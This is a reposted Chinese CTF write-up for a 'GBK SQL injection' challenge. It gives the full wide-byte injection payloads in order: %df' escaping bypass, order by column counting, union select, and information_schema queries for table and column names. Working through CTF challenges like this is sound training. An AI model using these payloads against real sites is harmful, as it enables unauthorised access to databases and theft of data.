南邮ctf mysql_南邮CTF--SQL注入题
南郵CTF--SQL注入題
題目:GBK SQL injection
解析:
1.判斷注入點:加入單引號發(fā)現(xiàn)被反斜杠轉移掉了,換一個,看清題目,GBK,接下來利用寬字節(jié)進行注入
2.使用‘%df‘ ‘進行注入,emm報錯,于是加入老手段,and 1=1 %23,ok,沒報錯,說明成功
3.繼續(xù)改參數(shù),1=2時,沒有任何信息,找到注入點
4.利用order by 查詢列數(shù),當查詢2時,顯示正常,那么查詢3時,顯示錯誤,確定為2列。
5.既然查詢到列,使用聯(lián)合查詢,union select 1,2 %23,
6.獲取當前數(shù)據(jù)庫:union select 1,database() %23
7.獲取當前數(shù)據(jù)庫名: id=1%df‘ and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23
group_concat(table_name) 分組以后,把想要顯示的列通過gruop_concat()函數(shù)拼接在一起。
information_schema.TABLES 切說是信息數(shù)據(jù)庫。其中保存著關于MySQL服務器所維護的所有其他數(shù)據(jù)庫的信息。如數(shù)據(jù)庫名,數(shù)據(jù)庫的表,表欄的數(shù)據(jù)類型與訪問權限等。
8.獲取表名(ctf-4)id=1%df‘ and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23
總結
以上是生活随笔為你收集整理的南邮ctf mysql_南邮CTF--SQL注入题的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: js距离米转换为千米_千米的换算题(千米
- 下一篇: 小程序下拉菜单组件(含多层筛选)